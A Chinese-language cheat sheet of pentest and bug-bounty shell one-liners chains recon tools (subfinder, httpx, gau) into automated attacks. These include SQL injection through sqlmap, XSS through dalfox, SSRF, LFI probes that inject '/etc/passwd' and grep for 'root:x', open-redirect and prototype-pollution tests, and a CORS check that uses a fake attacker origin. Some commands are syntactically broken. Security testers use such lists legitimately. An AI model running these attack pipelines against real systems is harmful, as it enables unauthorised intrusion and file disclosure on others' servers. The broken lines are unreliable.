注意：本文不含工具安装教程，请自行安装并配置环境变量。以下命令仅适用于Linux|MacOS上运行

1.单工具使用

Automatic Scan - 使用 wappalyzer 技术检测目标应用的技术栈或组件进行自动 Web 扫描

nuclei -u https://example.com -as

只运行在最新nuclei-templates版本中添加的模板

nuclei -u https://example.com -nt

跳过需要身份验证的模板

nuclei -no-verify -t https://example.com -t /root/nuclei-templates/

全漏洞扫描，结果去重写入文件

nuclei -t /root/nuclei-templates/ -severity critical,high,medium -l list.txt -bs 20 -c 30 -rl 120 -nc -es info | anew -q all_nuclei_output.txt

sql注入扫描

echo "http://www.example.com" | httpx -path "/listproducts.php?cat=1’" -ms "Error: You have an error in your SQL syntax;"

2.组合工作流

进行子域枚举，检查HTTP服务，并将结果通过管道传输到 Nuclei 进行模板的漏洞扫描

subfinder -d targetdomain.com -silent | httpx | nuclei -t technologies/tech-detect.yaml

验证主机/域/资产存活状态

subfinder -d targetdomain.com -silent | httpx -silent -follow-redirects -mc 200 -timeout 10 | cut -d '/' -f3 | sort -u
amass enum -d targetdomain.com | httpx -silent -follow-redirects --fc 0,502,400,405,410,503,504 -timeout 10| cut -d '/' -f3 | sort -u

网站预览截图

assetfinder -subs-only http://target.com | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @' 

扫描子域测试站点

subfinder -d domain -silent | dnsprobe -silent | cut -d ' ' -f1 | grep --color 'dmz\|api\|staging\|env\|v1\|stag\|prod\|dev\|stg\|test\|demo\|pre\|admin\|beta\|vpn\|cdn\|coll\|sandbox\|qa\|intra\|extra\|s3\|external\|back'

XSS

cat targets.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @
cat targets.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"

SQL注入

httpx -l targets.txt -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1'

SSRF

findomain -t http://target.com -q | httpx -silent -threads 1000 | gau |  grep "=" | qsreplace http://www.example.com

LFI

gau http://vuln.target.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'

重定向

gau http://vuln.target.com | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'

Prototype污染

subfinder -d http://target.com | httpx -silent | sed 's/$/\/?__proto__[testparam]=exploit\//' | page-fetch -j 'window.testparam=="exploit"?"[VULN]":"[NOT]"' | sed "s/(//g"|sed"s/)//g" | sed "s/JS//g" | grep "VULN"

CORS

gau http://vuln.target.com | while read url;do target=$(curl -s -I -H "Origin: https://evvil.com" -X GET $url) | if grep 'https://evvil.com'; then [Potentional CORS Found]echo $url;else echo Nothing on "$url";fi;done

提取js文件

echo http://target.com | haktrails subdomains | httpx -silent | getJS --complete | tojson | anew JS1
assetfinder http://vuln.target.com | waybackurls | grep -E "\.json(?:onp?)?$" | anew 

从网页源码中提取注释中URL

cat targets.txt | html-tool comments | grep -oE '\b(https?|http)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]'

从hackerone上发现转储所属目标企业资产

curl -sL https://github.com/arkadiyt/bounty-targets-data/blob/master/data/hackerone_data.json?raw=true | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type]

持续更新，欢迎补充 😉